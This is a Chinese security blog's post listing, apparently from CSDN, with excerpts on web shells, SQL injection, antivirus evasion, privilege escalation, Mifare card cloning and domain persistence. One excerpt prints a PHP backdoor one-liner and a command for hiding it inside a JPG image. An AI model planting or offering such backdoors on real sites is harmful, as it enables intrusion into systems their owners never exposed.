- 博客(396)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 无需sendmail:巧用LD_PRELOAD突破disable_functions
摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的webshell 是无意义的,看我如何突破!|半月前逛“已黑网站列表”时复审一小电商网站,“列表”中并未告知漏洞详情,简单浏览了下功能,只有注册、登录、下单...
2019-12-03 11:37:21
819
3
原创 灰色产业链成病毒传播最大渠道 流量生意或迎来最后的疯狂
咳咳 嗯 有段时间的 最近吗 都放暑假了 没有什么好更新的 最近我们都在关心2020微软的更新问题 对我们的这类人还是有些要求的我也不想到时候大家再跌跟头 吃亏什么的 今天就讲解一下吧 声明:我暑假是有别的事在做 很少更新 大家可以去我微信或者论坛留言我会挑一些来回答【快讯】劫持浏览器、刷取流量等行为是流氓软件常见行为,而随着安全厂商持续打击、普通用户的安全意识提升,让病毒团...
2019-07-26 13:24:48
1396
1
原创 谈谈Json格式下的CSRF攻击
一、CSRF漏洞简介csrf漏洞的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,那以后只要是访问这个网站,都会默认你已经登录的状态。而在这个期间,攻击者发送了构造好的csrf脚本或包含csrf脚本的链接,可能会执行一些用户不想做的功能(比如是添加账号等)。这个操作不是用户真正想要执行的。在post标准化格式(accounts=test&password...
2019-06-27 20:32:25
4373
原创 记一次被DDoS敲诈的历程
0×01 背景背景是这样,一个朋友网站业务被DDoS了,先是威胁要800元RMB,然后又转成提供DDOS的服务,然后又变成了DoS培训, 又变成了卖DDoS软件,最后又变成了DDoS高防护提供者,最后到警察叔叔那里,报警立案成功的故事。0×02 来自黑客的威胁就在这几天,一个朋友传来了他被DDoS的消息,正在搬砖中看到他发的消息,说他们的客服收到到0118号客人的威胁信息,说要马上干掉你们。...
2019-06-26 13:18:18
1063
原创 企业威胁情报平台建设之暗网监控
一、前言相信大家对暗网这个概念并不陌生,众所周知,暗网藏着一个暗黑版的交易市场,违法工具、色情交易、毒品交易、枪械信息比比皆是,俨然一个网络犯罪分子聚集的“虎狼之穴”。我们使用Tor浏览器等可以轻松访问暗网中的浅层网,主要是黄赌毒和数据情报信息,如丝绸之路等。对于企业而言,往往不免被黑客攻击而被获取大量的数据,而这些数据一般会优先在暗网售卖,如近年来的12306、各大互联网公司等的数据泄露事...
2019-06-26 13:02:08
3485
1
原创 TrackRay:打造一款自己的渗透测试框架
rackRay简介溯光,英文名“TrackRay”,意为逆光而行,追溯光源。同时致敬安全圈前辈开发的“溯雪”,“流光”。溯光是一个开源的插件化渗透测试框架,框架自身实现了漏洞扫描功能,集成了知名安全工具:Metasploit、Nmap、Sqlmap、AWVS等。溯光使用 Java 编写,SpringBoot 作为基础框架,JPA + HSQLDB嵌入式数据库做持久化,Maven管理依赖,...
2019-06-26 12:58:06
1334
原创 Donut:将.NET程序集注入Windows进程
Donut是一个shellcode生成工具,它可以从.NET程序集中创建与位置无关的shellcodepayloads。此shellcode可用于将程序集注入任意Windows进程。给定一个任意.NET程序集,参数和入口点(如Program.Main),Donut就可为我们生成一个与位置无关的shellcode,并从内存加载它。.NET程序集可以通过直接嵌入shellcode从URL或Sta...
2019-06-26 12:21:03
1169
原创 DNSChanger卷土重来,家用路由器当心了
暑假快来了,各类打折活动即将到来,与此同时,新型的恶意软件已经上线。DNSChanger这个名字,大家或许有所耳闻。这款恶意软件曾在2012年感染了全世界范围内数百万台电脑。近日,ProofPoint的研究人员发现了升级版的DNSChanger EK(漏洞利用工具包),它利用恶意广告传播。在感染用户设备后,这个漏洞利用套装将修改路由器DNS服务器条目,指向攻击者控制的恶意DNS服务器。感...
2019-06-25 17:36:04
1588
原创 Shadow Brokers热卖中的NSA方程式黑客工具预览:是否值得剁手?
早在16年二月份,卡巴斯基安全实验室就发现一个名为方程式(Equation Group)的史上最强网络犯罪组织,并且该团伙已活跃近20年。而在今年八月份,NSA的方程式小组遭到Shadow Brokers黑客小组的入侵,部分NSA的软件和信息遭到泄露。原本,Shadow Brokers打算对这些泄露工具进行众筹销售。但是由于众筹效果不明显,所以Shadow Brokers决定将这些泄露工具打包出售...
2019-06-25 17:29:45
1610
1
原创 从少量访问日志还原黑客攻击过程
武侠世界里,常常会提到“尸体会说话”,而在网络的攻防世界里,日志是最重要的追踪手段。今天要说的故事是,通过仅仅几行访问请求来还原整个黑客的攻击过程和常见攻击手法。每天都有大量攻击者在利用已爆出的各种相应插件的漏洞,来攻击WordPress 和 Joomla 站点。下面主要来介绍利用 Google Dork 的攻击手法。Google Hacking 是黑客们来寻找攻击目标最常用的一种攻击手法...
2019-06-25 17:11:03
557
原创 浅谈精准提取日志中的URL
背景在分析日志的时候发现有些日志中参数中包含其他的URL,例如:http://www.xxx.cn/r/common/register_tpl_shortcut.php?ico_url=http://www.abcfdsf.com/tg_play_1121.php&supplier_id=3&ep=tg&style=szsg_reg_tg03http://b.xxx...
2019-06-25 17:06:37
1942
原创 Web攻击检测机器学习深度实践
一、概述1.1 传统WAF的痛点传统的WAF,依赖规则和黑白名单的方式来进行Web攻击检测。该方式过分依赖安全人员的知识广度,针对未知攻击类型无可奈何;另一方面即使是已知的攻击类型,由于正则表达式天生的局限性,以及shell、php等语言极其灵活的语法,理论上就是可以绕过,因此误拦和漏拦是天生存在的;而提高正则准确性的代价就是添加更多精细化正则,由此陷入一个永无止境打补丁的漩涡,拖累了整体性能...
2019-06-25 17:02:57
3503
3
原创 影响数千网站的第三方JavaScript库文件漏洞分析
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担当前,很多网站都会使用第三方特定JavaScript库的方式来增强网站的显示应用功能,通常情况下,这种嵌入到网站中的库可以方便直接地从第三方服务提供商的域中加载,实现对当前网站的优化和功能增强。然而,这种嵌入到很多网站中的第三方库往往会是一个致命的攻击面,可以导致嵌入网站更容易...
2019-06-25 16:53:38
976
原创 渗透检测中的社会工程学
这是我渗透过程中的一次真实经历,我也没有想到在经过两天的时间拿到主站服务器时,主站程序却放在主站服务器的虚拟机上,跑的是一个linux系统,进入需要root用户名和密码,但那个root用户名和密码却没有找到,那怎么办呢?是一个排名很高的台湾站点,有很多分站,我一个一个的分站查询,在一个分站上扫描网页目录和文件夹的时候得到一个admin.txt文档,里面记录了分站的分布对应的内网ip.有了分站的详...
2019-06-25 16:45:50
710
原创 【科普文】双查询注入
介绍一下双查询注入,什么叫双查询注入,这个有点难以解释,通俗的来说就是嵌套子查询。我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select,里面的这个select语句就是子查询。这种方法适用于注入的时候没有返回位,但是有返回位的时候也适用,不过又返回位的时候就不建议在、用这个啦!返回位就是你们union select 1...
2019-06-23 20:00:51
614
原创 闲谈 bypass AV
孩纸,看到AV别乱想~这里说的AV是AntiVirus。即杀软。(这些日子考试繁重,更的少了…)本篇文章简单说一下本人平时常用的免杀工具以及其使用~0x00 Hyperion第一个说说这个 Hyperion,因为比较轻量级~,为什么说轻量级呢,因为,360杀毒能检测出。。其实 Hyperion 是一款加密工具,通过5轮AES加密来加密的你payload,加密完成后的payload是可以...
2019-06-23 19:46:29
4888
原创 Linux渗透与提权:技巧总结篇
本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux 系统下的一些常见路径:/etc/passwd/etc/shadow/etc/fstab/etc/host.conf/etc/motd/etc/ld.so.conf/var/www/htdocs/index.php/var/www/c...
2019-06-23 19:40:00
2515
原创 Windows渗透与提权:技巧总结篇
旁站路径问题:1、读网站配置。2、用以下VBS:On Error Resume NextIf (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") ThenMsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13)...
2019-06-23 19:29:22
1667
原创 [投稿]宽字节注入详解
、前言在mysql中,用于转义的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。首先,宽字节注入与HTML页面编码是无关的,笔者曾经看到<meta charset=utf8>就放弃了尝试,这是一个误区,SQ...
2019-06-23 17:47:19
833
原创 进监狱全攻略:Mifare1 Card破解
补充新闻:程序员黑餐馆系统 给自己饭卡里充钱 ,技术是双刃剑,小心,小心!前言从M1卡的验证漏洞被发现到现今,破解设备层出不穷,所以快速傻瓜式一键破解不是本文的重点,年轻司机将从本文中获得如下技能。如果你想简单快速的上手,你可以选择ACR122-like,Proxmark3等容易购买到的操作简单的设备,或者有个带有NFC功能并安装有安卓Mifare Classic Tool (MCT)...
2019-06-23 16:49:52
15859
2
原创 Metasploit工具Meterpreter的命令速查表
第1步:核心命令在其最基本的使用,meterpreter 是一个 Linux 终端在受害者的计算机上。这样,我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。这里有一些核心的命令可以用在meterpreter。? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist...
2019-06-23 16:41:12
325
原创 5000美刀的谷歌XSS
亲爱的黑阔们:最近我在找谷歌的一个叫做tagmanager的服务漏洞,这个服务被用作SEO运营。我主要研究的就是在找有木有可以插XSS的地方。但是所有的域都有过滤特殊字符的防护,各位可以从下面的图看出来。所以在这上面下功夫真的是脑洞不够……但是接下来我发现Tagmanager允许用户以JSON文件的形式上传一些的标签、宏、自定义数据等……接下来呢我就下载了个json模板文件并编辑了下它...
2019-06-23 16:39:09
244
原创 [投稿]Webshell下命令执行限制及绕过方法
0x00 前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0x01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码function execute($cfe) { $re...
2019-06-23 16:33:55
4015
原创 微信任意用户密码修改漏洞分析
今天发现个微信群发的漏洞.还没玩.就被修补了.于是就有了这个漏洞的产生.同样问题产生在重置用户密码的环节.在微信官方的首页上发现新增了如下功能模块访问后看到这个功能.来了兴趣**在这个页面输入一个已经注册了微信的手机号.得到如下提示选择我已收到验证码就跳转到一个修改密码的页面,如下在这一步抓包.得到如下包文check=false&phone=1866666...
2019-06-23 16:30:00
2334
3
原创 Metasploit => tips, tricks, hashes and tokens
metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架.metasploit或许在渗透测试中的每一方面都不能称为最好用的工具,但是这个工具有它自己的方便之处.这篇文章中,我会演示在一次渗透测试中我们会经历哪些步骤,并且我会故意的只使用metasploit来完成这些工作,以此来显示metasploit的威力所在.渗透测试中不能仅仅依赖工具,...
2019-06-23 16:22:19
180
原创 一种隐藏在JPG图片EXIF中的后门
哎,怎么说呢!对本章第七次,我多次强调一句话的意义是为了大家熟悉网络安全环境,注意防范几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_repla...
2019-06-23 16:07:53
748
原创 新浪微活动存在钓鱼漏洞用户信息恐泄露
漏洞证明:通过漏洞可使系统自动发信息告诉你 已中奖 增加可信度!这是发活动后3分钟内中招的用户在十多分钟内我就收集到了300名的用户信息!骗子证明:我上微博时候发现有人转发了@茅台网上商城 发起的活动 一个砸金蛋的,因为链接地址属新浪 所以我相信了,狗屎的砸了一下发现中奖,按照页面提示写了个人信息。本想坐等奖可是后来觉得越来越不对劲,于是查了下。两个月不上微博,刚上就给我们发中...
2019-06-23 16:04:23
216
原创 有源代码就可控了吗?——SE Linux疑云
斯诺登的爆料使全世界都带着怀疑的目光重新审视NSA,对他们所做的每一件事情充满怀疑。NSA刚刚推出SELinux那几年,人们就不断地追问,NSA的代码是否可信赖?是否有后门?但SELinux是开源的,理论上人人都可以去看源码里面有没有后门,也从没有人发现过后门,所以讨论渐渐偃旗息鼓。可到了2013年,斯诺登横空出世,这个怀疑再度喧嚣尘上。SELinux是一个Linux内核模块,2000年底在G...
2019-06-23 16:01:32
416
原创 巧用DSRM密码同步将域控权限持久化
0x00 前言本文将会讲解在获取到域控权限后如何利用DSRM密码同步将域管权限持久化。 不是科普文,废话不多说。环境说明:域控:Windows Server 2008 R2域内主机:Windows XP0x01 DSRM密码同步这里使用系统安装域时内置的用于Kerberos验证的普通域账户krbtgt。PS:Windows Server 2008 需要安装KB961320补丁才支持...
2019-06-23 16:00:30
447
原创 MYSQL高级爆错注入原理
国内只有一大堆高级爆错的利用代码 没人分析原因 这个是去官网查资料后分析给出的。 这里主要用了mysql的一个BUG:http://bugs.mysql.com/bug.php?id=8652grouping on certain parts of the result from rand, causes a duplicatekey error.重现过程use mysql;cre...
2019-06-23 15:54:13
477
原创 以新浪为例浅谈XSS
随着网络时代的飞速发展,网络安全问题越来越受大家的关注,而SQL注入的攻击也随着各种防注入的出现开始慢慢的离我们而去,从而XSS跨站脚本攻击也慢慢的开始在最近几年崛起,也应对了’没有绝对的安全’这句话。XSS攻击: 它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。大家刚接触XSS的时候和我大概也差不多,都是在不断的在各种搜索栏,地址栏中或...
2019-06-21 19:32:36
227
原创 WAF指纹探测及识别技术
Web应用防护系统(也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。本文 介绍了常见的WAF指纹识别的一些技术,详见如下:WAF指纹Cookie值Citrix Netscaler“Citrix Netsc...
2019-06-21 17:40:43
2234
原创 基于无状态的极速扫描技术(适用于新手)
大家都知道TCP是可靠的面向连接的协议,一个完整的TCP会话每个过程 都有不同的状态。正是操作系统在底层已经保存了这些状态我们在应用层使用起来才更方便可靠。可靠的同时带来的是资源占用,在古老的xp时代系统 TCP/IP连接默认只有10个。即使系统没有这种限制,应用内部要使用上万的连接也是消耗极大资源的,一般的应用程序每个连接启动一个线程。 apache 默认1500个连接,打垮它是很容易的。无...
2019-06-21 17:35:00
2022
原创 拿wordpress站的一个小技巧
记得09年时wp爆过一个重置管理口令的漏洞, 现在用法差不多, 也是我刚刚发现, 网上也没找到有讲述关于这个的.前提:是在有注入点(注入点的话可以通过寻找插件漏洞获得。), 密码解不开, 无法output的情况下获取shell的情况下使用的.这个其实也不算漏洞, 就是结合起来能利用到而已. 因为wp的找回密码系统对管理员账户同样生效, 而发送至邮箱的key在数据库中同样保存下来, 所以就可以直...
2019-06-21 17:29:14
454
原创 rsync的几则tips(渗透技巧)
关于rsyncrsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。rsync默认配置文件为/etc/rsyncd.c...
2019-06-21 17:26:03
1144
原创 使用shellcode打造MSF免杀payload
0x00 前言经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。0x01 从哪里开始shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用的payload:reverse_tcp来做测试吧!(其它...
2019-06-21 17:13:00
1910
原创 浅谈WEB Fuzz中需要关注的7种响应
WEB应用模糊测试(WEB Fuzz)是一种特殊形式的网络协议模糊测试,专门关注遵循HTTP规范的网络数据包。WEB Fuzz并不是新的概念,目前有多种WEB应用模糊测试器(WEB Fuzzer),比如SPIKE Proxy、SPI Fuzzer、besTORM,以及渗透人员喜爱的Burp Suite。在Fuzz请求完成后,目标应用发回来的响应提供了Fuzz请求所造成影响的各种线索。如果发现...
2019-06-21 17:08:27
1470
原创 PHP图片后门藏匿攻略
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:<?php assert($_POST[feiji]);?>2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\ht...
2019-06-21 17:06:48
1816
原创 【投稿】中间人攻击之劫持会话
前段时间redrain大神和一个学院派教授争执最后连国民老公—-王思聪都来观战啦!! 局域网再次进入了公众的视野~ 局域网内无隐私! 这两天没什么事情查了查中间人攻击 结果发现网络上面的资料并不是很完全 所以写了这篇文章给小黑们进行参考 本人水平有限 大牛们不喜勿喷。。。本次的中间人攻击使用DHCP来劫持DNS 个人感觉测试了几回后效果比arp欺骗要好很多拓扑路由器:192.168...
2019-06-21 17:00:59
721
原创 利用phpinfo信息LFI临时文件[附POC]
还记得之前国外某牛提出的LFI包含临时文件么?当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以 利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配 成,而且临时文件保存的路径也只能靠猜。我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临...
2019-06-18 22:31:39
987
学生个人主页 英文版 .html
2019-12-28
易语言破解工具.exe
2019-05-24
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人